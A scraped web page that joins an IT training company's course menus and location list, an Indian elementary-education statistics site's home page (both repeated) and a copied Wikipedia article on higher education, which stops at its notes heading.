Sunday, March 7, 2010
Learning Centres
My Account | View Cart
Search Courses: Find Locations: Advanced Search
Business Solutions
Enterprise Learning Solutions
Small and Medium Business Solutions
Government Training Solutions
Professional Services
Solutions for Individuals
Career Training Programs
IT Training Programs
Healthcare
MyCAA Program
Student Services
Student Testimonials
Tuition Assistance
Courses
Microsoft Technical
Microsoft Exchange Server 2003
Microsoft Exchange Server 2007
Microsoft SharePoint 2007
Microsoft SQL Server 2005
Microsoft SQL Server 2008
Microsoft Visual Studio 2005 and .NET
Microsoft Visual Studio 2008 and .NET
Microsoft Windows 7
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Windows Live
BizTalk Server
Microsoft Office
Access
Business Skills/ Information Worker
Excel
FrontPage
InfoPath
OneNote
Outlook
PowerPoint
Publisher
Project
Visio
Word
Graphic Design and Media
Acrobat
AutoCAD
CorelDRAW
Dreamweaver
Fireworks
FrameMaker
FreeHand
FrontPage
GoLive
HTML
Illustrator
InDesign
Macromedia Flash
PageMaker
Photoshop
Publisher
QuarkXPress
Cisco
Citrix
CompTIA
A+
CDIA+
Convergence+
CTT+
HTI+
iNet+
Linux+
Network+
Project+
RFID+
Security+
Server+
Information Security
Novell
Red Hat
Business Skills
Healthcare Information Management
English
Certifications
Microsoft Training
Microsoft Certified Professional (MCP)
Microsoft Certified IT Professional (MCITP)
Microsoft Certified Professional Developer (MCPD)
Microsoft Certified Technology Specialist (MCTS)
Microsoft Certified Systems Administrator (MCSA)
Microsoft Certified Database Administrator (MCDBA)
Microsoft Certified Desktop Support Technician (MCDST)
Microsoft Certified Systems Engineer (MCSE)
Microsoft Office Specialist (MOS)
Windows OS Certifications
MCTS Windows 7, Configuration
MCITP Windows 7, Enterprise Desktop Support Technician
MCITP Windows 7, Enterprise Desktop Administrator
MCTS Windows Vista Configuration
MCTS Windows Vista Business Desktop Deployment
MCITP Consumer Support Technician
MCITP Enterprise Support Technician
MCDST Windows XP
Windows Server Certifications
MCTS: Windows Server 2008 Active Directory Configuration
MCTS: Windows Server 2008 Applications Infrastructure
MCTS: Windows Server 2008 Network Infrastructure
MCITP: Windows Server 2008 Administrator
MCITP: Windows Server 2008 Enterprise Administrator
Upgrade Server 2003 MCSA to Server 2008 Certifications
Upgrade Server 2003 MCSE to Server 2008 Certifications
Cisco
Cisco CCENT Certification
Cisco CCNA Certification
Cisco CCNA Security Certification
Cisco CCNA Voice Certification
Cisco CCNA Wireless Certification
Cisco CCDA Certification
Cisco CCNP Certification
Cisco CCSP Certification
Cisco CCDP Certification
Cisco CCIP Certification
Cisco CCVP Certification
Cisco Learning Credits and Training
CompTIA
CompTIA A+ Certification
CompTIA Linux+
CompTIA Project+ Certification Training
CompTIA Network+ Certification
CompTIA Security+ Certification
Help Desk
Information Security
Security Certified Program
Security+ Certification
Certified Ethical Hacker
New Horizons Training for Certified Information Systems Security Professional Certification
Microsoft Certified Systems Administrator on Windows Server 2003: Security Specialization
Microsoft Certified Systems Engineer on Windows Server 2003: Security Specialization
Linux
Novell Certified Linux Professional (CLP)
CompTIA Linux+
Red Hat Certified Technician (RHCT)
Red Hat Certified Engineer (RHCE)
Red Hat Certified Security Specialist (RHCSS)
Red Hat Certified Datacenter Specialist (RHCDS)
Red Hat Certified Architect (RHCA)
Citrix
Citrix Certified Administrator (CCA)
Citrix Certified Enterprise Administrator (CCEA)
Citrix Certified Integration Architect (CCIA)
Novell
Certified Novell Administrator (CNA)
Certified Novell Engineer (CNE)
Novell Certified Linux Professional (CLP)
Learning Methods
Our Approach
Assess
Learn
Reinforce
Support
Validate
Traditional Instructor Led Training
Mentored Learning
Online LIVE
Technical Requirements
Online ANYTIME
Learning Port
On-Site Training
About Us
About New Horizons
Newsroom
Press Releases
Corporate Governance
Audit Committee
Compensation Committee
Conducts and Ethics
Governance Committee
Products and Services Committee
Investor Relations
Franchising Information
Why Franchising? Why the IT Training Industry?
Why New Horizons?
Open Territory Franchise Websites
Franchise Owner Testimonials
Franchise Training and Support
Franchisee Profile and Requirements
Investment
FAQ
Steps to Own a New Horizons Franchise
Request for Consideration
Case Studies
Five Star Center of Excellence Award
Learning Resources
Course Catalog
Learning Port
Case Studies
Webinars
Tips and Tricks
Newsletter
Student Resources
Learning Centers - Search Results
Asia Pacific
Kabul, Afghanistan Hathras, India
Brisbane, Australia Hissar, India
Melbourne, Australia Hyderabad, India
Newcastle, Australia Jaipur, India
Perth, Australia Jalandhar, India
Cairns, Australia Jodhpur, India
Sydney, Australia Kolkata, India
Chittagong, Bangladesh Delhi, India
Dhaka, Bangladesh Navi Mumbai, India
Gulshan, Bangladesh Pune, India
Phnom Penh, Cambodia Rewari, India
Hagatna, Guam Jakarta, Indonesia
Agra, India Seoul, Korea
Ahmedabad, India Penang, Malaysia
Ambala, India Johor Bahru, Malaysia
Bangalore, India Kota Kinabalu, Malaysia
Bareilly, India Kuala Lumpur, Malaysia
Belgaum, India Kuantan, Malaysia
Chennai, India Kuching, Malaysia
Coimbatore, India Petaling Jaya, Malaysia
Coonoor, India Kathmandu, Nepal
Gurgaon, India Karachi, Pakistan
Guwahati, India Singapore, Singapore
Home
Search
Locations
Privacy Policy
Terms & Conditions
Contact
Copyright © 2010 New Horizons Worldwide, Inc. All rights reserved.
Search Courses: Find Locations: Advanced Search
Business Solutions
Enterprise Learning Solutions
Small and Medium Business Solutions
Government Training Solutions
Professional Services
Solutions for Individuals
Career Training Programs
IT Training Programs
Healthcare
MyCAA Program
Student Services
Student Testimonials
Tuition Assistance
Courses
Microsoft Technical
Microsoft Exchange Server 2003
Microsoft Exchange Server 2007
Microsoft SharePoint 2007
Microsoft SQL Server 2005
Microsoft SQL Server 2008
Microsoft Visual Studio 2005 and .NET
Microsoft Visual Studio 2008 and .NET
Microsoft Windows 7
Microsoft Windows Server 2003
Microsoft Windows Server 2008
Windows Live
BizTalk Server
Microsoft Office
Access
Business Skills/ Information Worker
Excel
FrontPage
InfoPath
OneNote
Outlook
PowerPoint
Publisher
Project
Visio
Word
Graphic Design and Media
Acrobat
AutoCAD
CorelDRAW
Dreamweaver
Fireworks
FrameMaker
FreeHand
FrontPage
GoLive
HTML
Illustrator
InDesign
Macromedia Flash
PageMaker
Photoshop
Publisher
QuarkXPress
Cisco
Citrix
CompTIA
A+
CDIA+
Convergence+
CTT+
HTI+
iNet+
Linux+
Network+
Project+
RFID+
Security+
Server+
Information Security
Novell
Red Hat
Business Skills
Healthcare Information Management
English
Certifications
Microsoft Training
Microsoft Certified Professional (MCP)
Microsoft Certified IT Professional (MCITP)
Microsoft Certified Professional Developer (MCPD)
Microsoft Certified Technology Specialist (MCTS)
Microsoft Certified Systems Administrator (MCSA)
Microsoft Certified Database Administrator (MCDBA)
Microsoft Certified Desktop Support Technician (MCDST)
Microsoft Certified Systems Engineer (MCSE)
Microsoft Office Specialist (MOS)
Windows OS Certifications
MCTS Windows 7, Configuration
MCITP Windows 7, Enterprise Desktop Support Technician
MCITP Windows 7, Enterprise Desktop Administrator
MCTS Windows Vista Configuration
MCTS Windows Vista Business Desktop Deployment
MCITP Consumer Support Technician
MCITP Enterprise Support Technician
MCDST Windows XP
Windows Server Certifications
MCTS: Windows Server 2008 Active Directory Configuration
MCTS: Windows Server 2008 Applications Infrastructure
MCTS: Windows Server 2008 Network Infrastructure
MCITP: Windows Server 2008 Administrator
MCITP: Windows Server 2008 Enterprise Administrator
Upgrade Server 2003 MCSA to Server 2008 Certifications
Upgrade Server 2003 MCSE to Server 2008 Certifications
Cisco
Cisco CCENT Certification
Cisco CCNA Certification
Cisco CCNA Security Certification
Cisco CCNA Voice Certification
Cisco CCNA Wireless Certification
Cisco CCDA Certification
Cisco CCNP Certification
Cisco CCSP Certification
Cisco CCDP Certification
Cisco CCIP Certification
Cisco CCVP Certification
Cisco Learning Credits and Training
CompTIA
CompTIA A+ Certification
CompTIA Linux+
CompTIA Project+ Certification Training
CompTIA Network+ Certification
CompTIA Security+ Certification
Help Desk
Information Security
Security Certified Program
Security+ Certification
Certified Ethical Hacker
New Horizons Training for Certified Information Systems Security Professional Certification
Microsoft Certified Systems Administrator on Windows Server 2003: Security Specialization
Microsoft Certified Systems Engineer on Windows Server 2003: Security Specialization
Linux
Novell Certified Linux Professional (CLP)
CompTIA Linux+
Red Hat Certified Technician (RHCT)
Red Hat Certified Engineer (RHCE)
Red Hat Certified Security Specialist (RHCSS)
Red Hat Certified Datacenter Specialist (RHCDS)
Red Hat Certified Architect (RHCA)
Citrix
Citrix Certified Administrator (CCA)
Citrix Certified Enterprise Administrator (CCEA)
Citrix Certified Integration Architect (CCIA)
Novell
Certified Novell Administrator (CNA)
Certified Novell Engineer (CNE)
Novell Certified Linux Professional (CLP)
Learning Methods
Our Approach
Assess
Learn
Reinforce
Support
Validate
Traditional Instructor Led Training
Mentored Learning
Online LIVE
Technical Requirements
Online ANYTIME
Learning Port
On-Site Training
About Us
About New Horizons
Newsroom
Press Releases
Corporate Governance
Audit Committee
Compensation Committee
Conducts and Ethics
Governance Committee
Products and Services Committee
Investor Relations
Franchising Information
Why Franchising? Why the IT Training Industry?
Why New Horizons?
Open Territory Franchise Websites
Franchise Owner Testimonials
Franchise Training and Support
Franchisee Profile and Requirements
Investment
FAQ
Steps to Own a New Horizons Franchise
Request for Consideration
Case Studies
Five Star Center of Excellence Award
Learning Resources
Course Catalog
Learning Port
Case Studies
Webinars
Tips and Tricks
Newsletter
Student Resources
Learning Centers - Search Results
Asia Pacific
Kabul, Afghanistan Hathras, India
Brisbane, Australia Hissar, India
Melbourne, Australia Hyderabad, India
Newcastle, Australia Jaipur, India
Perth, Australia Jalandhar, India
Cairns, Australia Jodhpur, India
Sydney, Australia Kolkata, India
Chittagong, Bangladesh Delhi, India
Dhaka, Bangladesh Navi Mumbai, India
Gulshan, Bangladesh Pune, India
Phnom Penh, Cambodia Rewari, India
Hagatna, Guam Jakarta, Indonesia
Agra, India Seoul, Korea
Ahmedabad, India Penang, Malaysia
Ambala, India Johor Bahru, Malaysia
Bangalore, India Kota Kinabalu, Malaysia
Bareilly, India Kuala Lumpur, Malaysia
Belgaum, India Kuantan, Malaysia
Chennai, India Kuching, Malaysia
Coimbatore, India Petaling Jaya, Malaysia
Coonoor, India Kathmandu, Nepal
Gurgaon, India Karachi, Pakistan
Guwahati, India Singapore, Singapore
Home
Search
Locations
Privacy Policy
Terms & Conditions
Contact
Copyright © 2010 New Horizons Worldwide, Inc. All rights reserved.
Education for all in India
Please visit 1 Million+ School Report Cards launched recently by Unioin Human Resource Development Minister, Government of India. For district-specific education data, log on to http://dise.in. District Report Cards in case of 633 districts across 35 States & UTs on hundred of variables is available. Keep watching for the latest information. Please downlaod Analytical Report and DISE Flash Statistics on Elementary Education in India from this site. For district-specific education data, log on to http:/dise.in. District Report Cards in case of more than 633 districts across 35 States & UTs on hundred of variables is available. Keep watching for latest information. Please downlaod Analytical Report and DISE Flash Statistics on Elementary Education in India from this site. Keep watching for latest information on school education in India and Right to Education Act and lot more.
NPE & POA
EFA in India
DPEP
Sarva Shiksha Abhiyan
Rastriya Madhyamik Shiksha Mission: Universal Secondary Education
Right to Education Bill
Educational Planning
Common School System
Educational Modules
EMIS
Research in Education
Educational Statistics
DISE Publications
Census of India: 2001
Mid-Day Meal Scheme
Education in Five Year Plans
Book Review
Educational Links
About Author
Site Map
Guest Book
Contact
educationforallinindia
schoolreportcards.in dpepmis.org
Web
Watch Videos on DISE: Management & Other Issues
Sunday, March 07, 2010
Welcome
The World of Education : At Your Service Since 1999
1 Million+ School Report Cards
( 1.29 million schools across 633 districts)
Subscribe
I am a doctoral researcher at the University of Cambridge. I have found your books on 'Education for All in India', and your website extremely helpful and innovative.
Thank you for making available so much valuable data and excellent analysis. I am a regular user and wish to congratulate those involved in contributing to and maintaining this website.
Rosie Vaughan Vimala Ramachandran
Free and compulsory education to all children up to the age fourteen is constitutional commitment in India. The Parliament of India has recently passed Right to Education Act through which education has become fundamental right of all children of age group 6-14 year.
The site - Education for All (EFA) in India presents up-to-date information regarding activities initiated in the field of elementary education in India. It presents National Policy on Education (1986,NPE) & its Programme of Action (POA, 1994) as well as goals and objectives of Education for All in India. A separate section is devoted on to District Primary Education Programme (DPEP) in terms of its framework, planning methodology adopted in developing District Primary Education Plans.
Sarva Shiksha Abhiyan (SSA), launched in 2001is the most recent initiatives of the Government of India, which presents its guidelines, planning methodology, data on elementary education created under District Information System for Education (DISE), list of districts covered, addresses of state implementation societies and outcome of the research studies conducted on school attendance, teachers absenteeism, out-of-school children, mid-day meal and many other aspects of elementary education in India.
The site has got separate channel for Educational Management Information System (EMIS) and presents school, district and state report cards as well as elementary education in rural and urban India and DISE Flash Statistics and analysis of data in the form of Elementary Education in India: Progress towards UEE, Analytical Report for 2006-07 and previous years. In addition, district-specific information on key variables concerning all the aspects of universal elementary education (UEE) is also presented. The site presents recent activities towards Rastriya Madhyamik Shiksha Abhiyan (RMSA) which is the most recent initiative of Government of India to achieve the goal of universalisation of secondary education (USE).
It has got separate channel for educational statistics and presents Selected Educational Statistics brought out by the Ministry of Human Resource Development (MHRD) for different years. In addition, the site also presents state and district-wise population (male, female & total, sex ratio, child sex ratio (o-6 year), density of population, population by religions, workers and non-workers and other such variables) and literacy rates (male, female & total, rural and urban areas and scheduled Castes and Scheduled Tribes) based on 2001 Census.
It also presents book reviews, educational links, UNESCO-UIS software for educational planners and many important documents such as common school system, modules on district educational planning and projections and forecasting of population, enrolment and teachers all which are important for those interested in educational planning and administration. It has got a separate channel on educational planning covering training at district (DIET), block, cluster and national level.
Model Rules for Right to Children Act (Draft)
DISE Flash Statistics: 2008-09
DISE Analytical Tables: 2007-08
DISE Analytical Report: 2007-08
Brief Analysis of DISE Flash Statistics: 2008-09
State Report Cards: 2007-08
Improvement in Infrastructure in Elementary /Schools
Participation of Muslim Children in Elementary Education: 2008-09
Study on Out-of-School-Children (IMRB/Ed.CIL/TSG): 2009
Evaluation of Activity Based Learning of Tamil Nadu
DISE 2007-08: District-specific Data on All Indicators
Universities in the Twenty-First Century
State Report Cards: 2007-08, Raw Data
District Report Cards: 2007-08, Volume I & II
10th Joint Review Mission Report (July 20 to 31, 2009)
Elementary Education in Rural India 2007-08
Elementary Education in Urban India 2007-08
DISE Flash Statistics: 2007-08
Analytical Report: 2006-07
District Report Cards: 2006-07 (Volume I)
District Report Cards: 2006-07 (Volume II)
Elementary Education in Rural India 2006-07
Elementary Education in Urban India 2006-07
President of India on Elementary Education
A View Inside Primary Schools
Special-Focus Districts
Muslim concentrated Towns
Districts having above 50 percent Out-of-school children
Review of SSA
Out of School Children
Mid-day Meal: Noon-Meal Scheme
DISE Flash Statistics & EDI: 2006-07
Latest Additional School Statistics: 2006-07
Scheme of Incentive to Girls for Secondary Education in India
Selected Educational Statistics: 2005-06
State Report Cards: 2005-06
Study on School Attendance
Analytical Report: 2005-06
Education in Parliament
Achievement Surveys under SSA
District Report Cards: 2005-06 (Volume I)
District Report Cards: 2005-06 (Volume II)
Student Flow at Primary Level
Elementary Education in Rural & Urban India: 2005-06
Report of Common School System
11th Five Year Plan: Elementary Education & SSA
DISE Flash Statistics & EDI
Presentation on EDI
Suggestive Framework for EDI Computation
Elementary Education in India: Analytical Report 2004-05
Elementary Education in India: Analytical Report 2005 (Only Tables)
Selected Educational Statistics: 2004-05
State Report Cards 2005
NPEGL
Elementary Education in Rural India 2004-05
Elementary Education in Urban India 2004-05
District Report Cards 2004-05 (Volume I)
District Report Cards 2004-05 (Volume II)
Drop-out Rates based on DISE 2003-4 & 2004-05 Data
Elementary Education in India: Analytical Report 2003-04
Major Findings of Analytical Report 2003-04
Elementary Education in Un-recognised Schools in India: A Case Study of Punjab
Universalisation of Secondary Education: CABE Committee Report
Right to Education Bill 2005
Elementary Education in India: State Report Cards 2003-04
Elementary Education in India: District Report Cards 2003-04
Elementary Education in India: District Report Cards 2002-03
Elementary Education in India: Where do we stand? Analytical Report 2002-03
Final District-specific Population & Literacy Data (Zip)
District Report Cards 2003, Raw Data (Zip)
Projected Population (5-18 Year) by RGI up to 2016
Age-specific Population: 6-11, 11-14 & 6-14 Year Population
Modules for Quantitative Analysis of Educational Data
Down Load: Software for Education Planning & Management
Download PDF
Some Reflections on Site
Web educationforallinindia.com schoolreportcards.in education.nic.in
Contact
EvaluateAnyWebsite estimates how much websites are worth.
NPE & POA
EFA in India
DPEP
Sarva Shiksha Abhiyan
Rastriya Madhyamik Shiksha Mission: Universal Secondary Education
Right to Education Bill
Educational Planning
Common School System
Educational Modules
EMIS
Research in Education
Educational Statistics
DISE Publications
Census of India: 2001
Mid-Day Meal Scheme
Education in Five Year Plans
Book Review
Educational Links
About Author
Site Map
Guest Book
Contact
educationforallinindia
schoolreportcards.in dpepmis.org
Web
Watch Videos on DISE: Management & Other Issues
Sunday, March 07, 2010
Welcome
The World of Education : At Your Service Since 1999
1 Million+ School Report Cards
( 1.29 million schools across 633 districts)
Subscribe
I am a doctoral researcher at the University of Cambridge. I have found your books on 'Education for All in India', and your website extremely helpful and innovative.
Thank you for making available so much valuable data and excellent analysis. I am a regular user and wish to congratulate those involved in contributing to and maintaining this website.
Rosie Vaughan Vimala Ramachandran
Free and compulsory education to all children up to the age fourteen is constitutional commitment in India. The Parliament of India has recently passed Right to Education Act through which education has become fundamental right of all children of age group 6-14 year.
The site - Education for All (EFA) in India presents up-to-date information regarding activities initiated in the field of elementary education in India. It presents National Policy on Education (1986,NPE) & its Programme of Action (POA, 1994) as well as goals and objectives of Education for All in India. A separate section is devoted on to District Primary Education Programme (DPEP) in terms of its framework, planning methodology adopted in developing District Primary Education Plans.
Sarva Shiksha Abhiyan (SSA), launched in 2001is the most recent initiatives of the Government of India, which presents its guidelines, planning methodology, data on elementary education created under District Information System for Education (DISE), list of districts covered, addresses of state implementation societies and outcome of the research studies conducted on school attendance, teachers absenteeism, out-of-school children, mid-day meal and many other aspects of elementary education in India.
The site has got separate channel for Educational Management Information System (EMIS) and presents school, district and state report cards as well as elementary education in rural and urban India and DISE Flash Statistics and analysis of data in the form of Elementary Education in India: Progress towards UEE, Analytical Report for 2006-07 and previous years. In addition, district-specific information on key variables concerning all the aspects of universal elementary education (UEE) is also presented. The site presents recent activities towards Rastriya Madhyamik Shiksha Abhiyan (RMSA) which is the most recent initiative of Government of India to achieve the goal of universalisation of secondary education (USE).
It has got separate channel for educational statistics and presents Selected Educational Statistics brought out by the Ministry of Human Resource Development (MHRD) for different years. In addition, the site also presents state and district-wise population (male, female & total, sex ratio, child sex ratio (o-6 year), density of population, population by religions, workers and non-workers and other such variables) and literacy rates (male, female & total, rural and urban areas and scheduled Castes and Scheduled Tribes) based on 2001 Census.
It also presents book reviews, educational links, UNESCO-UIS software for educational planners and many important documents such as common school system, modules on district educational planning and projections and forecasting of population, enrolment and teachers all which are important for those interested in educational planning and administration. It has got a separate channel on educational planning covering training at district (DIET), block, cluster and national level.
Model Rules for Right to Children Act (Draft)
DISE Flash Statistics: 2008-09
DISE Analytical Tables: 2007-08
DISE Analytical Report: 2007-08
Brief Analysis of DISE Flash Statistics: 2008-09
State Report Cards: 2007-08
Improvement in Infrastructure in Elementary /Schools
Participation of Muslim Children in Elementary Education: 2008-09
Study on Out-of-School-Children (IMRB/Ed.CIL/TSG): 2009
Evaluation of Activity Based Learning of Tamil Nadu
DISE 2007-08: District-specific Data on All Indicators
Universities in the Twenty-First Century
State Report Cards: 2007-08, Raw Data
District Report Cards: 2007-08, Volume I & II
10th Joint Review Mission Report (July 20 to 31, 2009)
Elementary Education in Rural India 2007-08
Elementary Education in Urban India 2007-08
DISE Flash Statistics: 2007-08
Analytical Report: 2006-07
District Report Cards: 2006-07 (Volume I)
District Report Cards: 2006-07 (Volume II)
Elementary Education in Rural India 2006-07
Elementary Education in Urban India 2006-07
President of India on Elementary Education
A View Inside Primary Schools
Special-Focus Districts
Muslim concentrated Towns
Districts having above 50 percent Out-of-school children
Review of SSA
Out of School Children
Mid-day Meal: Noon-Meal Scheme
DISE Flash Statistics & EDI: 2006-07
Latest Additional School Statistics: 2006-07
Scheme of Incentive to Girls for Secondary Education in India
Selected Educational Statistics: 2005-06
State Report Cards: 2005-06
Study on School Attendance
Analytical Report: 2005-06
Education in Parliament
Achievement Surveys under SSA
District Report Cards: 2005-06 (Volume I)
District Report Cards: 2005-06 (Volume II)
Student Flow at Primary Level
Elementary Education in Rural & Urban India: 2005-06
Report of Common School System
11th Five Year Plan: Elementary Education & SSA
DISE Flash Statistics & EDI
Presentation on EDI
Suggestive Framework for EDI Computation
Elementary Education in India: Analytical Report 2004-05
Elementary Education in India: Analytical Report 2005 (Only Tables)
Selected Educational Statistics: 2004-05
State Report Cards 2005
NPEGL
Elementary Education in Rural India 2004-05
Elementary Education in Urban India 2004-05
District Report Cards 2004-05 (Volume I)
District Report Cards 2004-05 (Volume II)
Drop-out Rates based on DISE 2003-4 & 2004-05 Data
Elementary Education in India: Analytical Report 2003-04
Major Findings of Analytical Report 2003-04
Elementary Education in Un-recognised Schools in India: A Case Study of Punjab
Universalisation of Secondary Education: CABE Committee Report
Right to Education Bill 2005
Elementary Education in India: State Report Cards 2003-04
Elementary Education in India: District Report Cards 2003-04
Elementary Education in India: District Report Cards 2002-03
Elementary Education in India: Where do we stand? Analytical Report 2002-03
Final District-specific Population & Literacy Data (Zip)
District Report Cards 2003, Raw Data (Zip)
Projected Population (5-18 Year) by RGI up to 2016
Age-specific Population: 6-11, 11-14 & 6-14 Year Population
Modules for Quantitative Analysis of Educational Data
Down Load: Software for Education Planning & Management
Download PDF
Some Reflections on Site
Web educationforallinindia.com schoolreportcards.in education.nic.in
Contact
EvaluateAnyWebsite estimates how much websites are worth.
Higher Education
Higher education
From Wikipedia, the free encyclopedia
N.B./Tertiary education as a concept in the United Kingdom and some other countries includes also further education[1] as well as higher education. For information about further education look under that term. For most other countries, "tertiary education" is synonymous with "higher education".
This article cites its sources but does not provide page references. You can help to improve it by introducing citations that are more precise.
The University of Cambridge is a prestigious institute of higher learning in the U.K.
Higher education refers to a level of education that is provided at academies, universities, colleges, vocational universities, community colleges, liberal arts colleges, institutes of technology and certain other collegiate-level institutions, such as vocational schools, trade schools, and career colleges, that award academic degrees or professional certifications.
Since 1950, Article 2 of the first Protocol to the European Convention on Human Rights obligates all signatory parties to guarantee the right to education. At the world level, the United Nations International Covenant on Economic, Social and Cultural Rights of 1966, guarantees this right under its Article 13, which states that "higher education shall be made equally accessible to all, on the basis of capacity, by every appropriate means, and in particular by the progressive introduction of free education".
Note that in North America, but not in Canada, the word "college" is very often used as a synonym for "university", especially in efficient conversation, for the simple reason that "college" is a two-syllable word, whereas "university" is five syllables long. Thus, if a person says, "I will return to college next fall," that term also includes any university, or any Institute of Technology (eight syllables long), such as the California Institute of Technology. However, in the United Kingdom and Australia, "University" is often shortened to "Uni".
Contents [hide]
1 Overview
2 Types
2.1 General
2.2 Liberal arts
2.2.1 Performing arts
2.2.2 Plastic or visual arts
2.3 Vocational
2.4 Professional Education
3 Recognition of studies
4 As employers
5 By region
5.1 Africa
5.2 Asia
5.3 Europe
5.4 North America and South America
5.5 Oceania
6 See also
7 Notes
8 References
9 External links
[edit]Overview
Higher Education is an educational level that follows the completion of a school providing a secondary education, such as a high school, secondary school, or gymnasium. Tertiary education is normally taken to include undergraduate and postgraduate education, as well as vocational education and training. Colleges, universities, and Institutes of Technology are the main institutions that provide tertiary education (sometimes known collectively as tertiary institutions). Examples of institutions that provide post-secondary education are vocational schools, community colleges, independent colleges (e.g. St. Mary's College), Institutes of Technology, and universities in the United States, the institutes of Technical and Further Educations in Australia, CEGEPs in Quebec, and the IEKs in Greece. They are sometimes known collectively as tertiary institutions. Completion of tertiary education generally results in the awarding of certificates, diplomas, or academic degrees, but the students who do not receive these (by poor performance) outnumber those who do. High performance is expected of students in Higher Education, and those who cannot meet the standards must leave.
Rupert I founded the University of Heidelberg in 1386
Higher education includes teaching, research, exacting applied work (e.g. in medical schools and dental schools), and social services activities of universities. Within the realm of teaching, it includes both the undergraduate level (sometimes referred to as tertiary education), and beyond that, graduate-level (or postgraduate level) for very highly-qualified students who wish to go further in their education and skills. This level of education is often referred to as graduate school, especially in North America.
In the United Kingdom and certain other counties (e.g. Ireland), post-secondary school education below the level of higher education is referred to as "further education". "Higher Education" in the U.K. generally involves work towards a college-degree-level or foundation degree education.
In many developed countries, a high proportion of the population (up to 50%), now enter higher education at some time in their lives. Higher education is therefore very important to national economies, both as a significant industry in its own right and as a source of trained and educated personnel for the rest of the economy.
There can be some disagreement about what precisely constitutes post-secondary, graduate-school, or tertiary education: "It is not always clear, though, what tertiary education includes. Is it only that which results in a formal qualification or might it include leisure classes? In the U.K., are A-levels tertiary education as they are post-compulsory, but taught in school settings, as well as colleges? Is professional updating or on-the-job training part of tertiary education, even if it does not follow successful completion of secondary education?"[2]
There are two types of higher education in the U.K.: higher academic education, and higher vocational education. Higher education in the United States and Canada specifically refers to post-secondary institutions that offer Associate's degrees, Bachelor's degrees, Master's degrees, Education Specialist (Ed.S.) degrees or Doctor of Philosophy (Ph.D.) degrees, or their equivalents, and also higher professional degrees in areas such as medicine, dentistry, the law, optometry, etc.
Such institutions may also offer non-degree certificates, which indicate completion of a set of courses comprising some body of knowledge, but the granting of such certificates is not the primary purpose of the institutions. Tertiary education is not a term used in reference to post-secondary institutions in the United States or Canada.
[edit]Types
[edit]General
The general higher education and training that takes place in a university, college, or Institute of Technology usually includes significant theoretical and abstract elements, as well as applied aspects. In contrast, the vocational higher education and training that takes place at vocational universities and schools usually concentrates on practical applications, with very little theory.
In addition, professional-level education is always included within Higher Education, and usually in Graduate Schools, since many postgraduate academic disciplines are both vocationally, professionally, and theoretically/research oriented, such as in medicine, the law, dentistry, and veterinary medicine. A basic requirement for entry into these graduate-level programs is almost always a bachelor's degree, and for many of the top-level medical schools (e.g. the University of Chicago), nearly all of the entering students already possess a Master's Degree or a Ph.D. in a relevant, supporting subject, such as chemistry, biology, physics, or chemical engineering. Requirements for admission to such high-level graduate programs is extremely competitive, and admitted students are expected to perform at a very high level.
[edit]Liberal arts
Main article: Liberal arts college
Academic areas that are included within the Liberal arts include:
History
Languages including English
Literature
Philosophy
Psychology
Sociology
Theater
Music
Political Science
Religious studies
The so-called "Great Books Program"
[edit]Performing arts
Main article: Performing arts education
The performing arts differ from the plastic arts or visual arts, insofar as the former uses the artist's own body, face and presence as a medium; the latter uses materials such as clay, metal or paint, which can be molded or transformed to create a work of art.
Higher educational institutions include:
Circus schools
College or university school of music
Dance school
Drama school
Music education
[edit]Plastic or visual arts
Main articles: Art education and Art school
The plastic arts or visual arts are a class of art forms, that involve the use of materials, that can be moulded or modulated in some way, often in three dimensions. Examples are painting, sculpture, and drawing, etc.
Higher educational institutions in these arts are:
Film schools
List of art schools
List of art schools in Europe
List of international architecture schools
[edit]Vocational
Main articles: Vocational university, Vocational school, and Technical school
Higher vocational education and training takes place at the non-university tertiary level. Such education combines teaching of both practical skills and theoretical expertise. Higher education differs from other forms of post-secondary education such as that offered by institutions of vocational education, which are more colloquially known as trade schools. Higher vocational education might be contrasted with education in a usually broader scientific field, which might concentrate on theory and abstract conceptual knowledge.
The term "vocational university" is a self-contradictory non sequitur (an oxymoron) in most countries, but some wish to use it, anyway. It is a so-called institution of higher education and sometime research, which grants so-called professional degrees like so-called professional bachelor's degree, professional master's degree, and professional doctorates) in a variety of subjects.
[edit]Professional Education
Scientific Dentistry
Human Medicine
Graduate College of the Law
Graduate College of Optometry
Veterinary Medicine
Graduate College of Public Policy
Graduate College of Architecture
Podiatric Medicine
Graduate College of Pharmacy
Graduate College of Business
Graduate College of Journalism
Graduate College of Library Science
Professional certification
[edit]Recognition of studies
The Lisbon Recognition Convention stipulates that degrees and periods of study must be recognised in all Signatory Parties of the Convention.
[edit]As employers
Universities are fairly large employers. Depending on the funding, a university typically has a teacher per 3-20 students. According to the ideal of research-university, the university teaching staff is actively involved in the research of the institution. In addition, the university usually also has dedicated research staff and a considerable support staff. Typically to work in higher education as a member of the academic faculty, a candidate must first obtain a doctorate in an academic field, although some lower teaching positions require only master's degree. Member of the staff or administration usually have education that is necessary for the fulfilment of their duties. Depending on the university, the main administration is more or less centralized. Typically most of the administrative staff works in different administrative sections, such as Student Affairs. In addition, there may be central support units, such as a university library which have a dedicated staff.
The professional field involving the collection, analysis, and reporting of higher education data is called institutional research. Professionals in this field can be found, in addition to universities, in e.g. state educational departments.
[edit]By region
[edit]Africa
Main article: Education in Africa
Education in Egypt
List of universities in South Africa
List of universities in Somalia
Madrasah
[edit]Asia
See also: Category:Universities and colleges in Asia
Colleges and institutes in India
Education in the People's Republic of China
Education in Bangladesh
Higher education in Iran
List of universities and colleges in Israel
List of colleges and universities in the Philippines
List of universities in Pakistan
Madrasah
[edit]Europe
Main article: European Higher Education Area
Dutch universities
Higher education in Poland
Italian universities
League of European Research Universities
List of colleges and universities in France
List of institutions of higher learning in Russia
List of universities in Germany
List of universities in Finland
List of universities in Romania
List of universities in Sweden
List of universities in Ukraine
Spanish universities
Universities in the United Kingdom
[edit]North America and South America
Higher education in Canada
Higher education in the United States
Universities and Higher Education in Brazil
List of schools in United States territories
List of universities in Mexico
List of Argentine universities
List of universities in Brazil
List of universities in Chile
List of universities in Peru
[edit]Oceania
List of universities in Australia
List of universities in New Zealand
Technical and Further Education (TAFE)
[edit]See also
Education portal
University portal
Book:Education
Books are collections of articles which can be downloaded or ordered in print.
Adult education
Academic Inflation
Academic job market
First professional degree
Foundation degree
Further education
Higher education policy
Liberal education
Lifelong learning
Professional certification
Remedial education
[edit]Notes
